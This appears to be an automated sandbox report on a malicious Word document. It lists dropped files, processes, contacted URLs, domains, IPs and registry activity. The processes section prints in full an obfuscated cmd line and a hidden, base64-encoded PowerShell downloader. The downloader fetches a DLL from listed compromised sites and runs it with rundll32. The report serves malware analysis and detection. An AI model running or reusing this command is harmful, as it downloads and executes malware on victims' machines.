Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
68254_2001.doc
|
initial sample
|
|||
C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 59134 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D0E98E-EB6B-4CC4-8C38-663EBE143117}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76C12E2-1DC6-41B5-9D5C-624688043260}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cab6327.tmp
|
Microsoft Cabinet archive data, 59134 bytes, 1 file
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Tar6328.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\68254_2001.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16
2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Jan 28 03:58:37 2021, length=161792, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VX1BP06RV53T455RIFFL.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$254_2001.doc
|
data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA=
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA=
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://ummahstars.com
|
unknown
|
||
https://hbprivileged.com
|
unknown
|
||
https://mrveggy.com/wp-admin/n/
|
unknown
|
||
https://www.teelekded.com/cgi-bin/LPo/
|
unknown
|
||
https://ummahstars.com/app_old_may_2018/assets/wDL8x/
|
unknown
|
||
http://ketoresetme.com/wp-content/Rk4rz/
|
70.32.23.58
|
||
https://theo.digital
|
unknown
|
||
http://intellisavvy.com
|
unknown
|
||
http://intellisavvy.com/wp-admin/dRaG2H/
|
192.124.249.8
|
||
https://mrveggy.com
|
unknown
|
||
https://hbprivileged.com/cgi-bin/Qg/
|
unknown
|
||
http://51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/
|
51.15.7.145
|
||
https://www.teelekded.com/cgi-bin/LPo/P
|
unknown
|
||
https://theo.digital/wp-admin/Zyl2/
|
unknown
|
||
http://ketoresetme.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://hbprivileged.comhB
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://certificates.godaddy.com/repository/0
|
unknown
|
||
http://www.piriform.com/ccleaneN
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
https://intellisavvy.com
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://intellisavvy.comh
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
https://intellisavvy.com/wp-admin/dRaG2H/
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://r3.o.lencr.org0
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://certificates.godaddy.com/repository/gdig2.crt0
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://servername/isapibackend.dll
|
unknown
|
||
http://cps.root-x1.letsencrypt.org0
|
unknown
|
||
http://r3.i.lencr.org/0%
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://cps.letsencrypt.org0
|
unknown
|
||
http://certs.godaddy.com/repository/1301
|
unknown
|
||
https://certs.godaddy.com/repository/0
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.godaddy.com/gdroot-g2.crl0F
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
http://crl.godaddy.com/gdig2s1-1814.crl0
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://crl.godaddy.com/gdroot.crl0F
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
hbprivileged.com
|
35.209.96.32
|
||
mrveggy.com
|
177.12.170.95
|
||
theo.digital
|
35.209.174.246
|
||
ummahstars.com
|
35.163.191.195
|
||
intellisavvy.com
|
192.124.249.8
|
||
ketoresetme.com
|
70.32.23.58
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
217.160.169.110
|
unknown
|
Germany
|
unknown
|
||
51.255.203.164
|
unknown
|
France
|
unknown
|
||
70.32.23.58
|
unknown
|
United States
|
unknown
|
||
35.209.174.246
|
unknown
|
United States
|
unknown
|
||
35.163.191.195
|
unknown
|
United States
|
unknown
|
||
192.124.249.8
|
unknown
|
United States
|
unknown
|
||
51.15.7.145
|
unknown
|
France
|
unknown
|
||
177.12.170.95
|
unknown
|
Brazil
|
unknown
|
||
35.209.96.32
|
unknown
|
United States
|
unknown
|
||
84.232.229.24
|
unknown
|
Romania
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
lg7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
fh7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
~i7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ED356
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
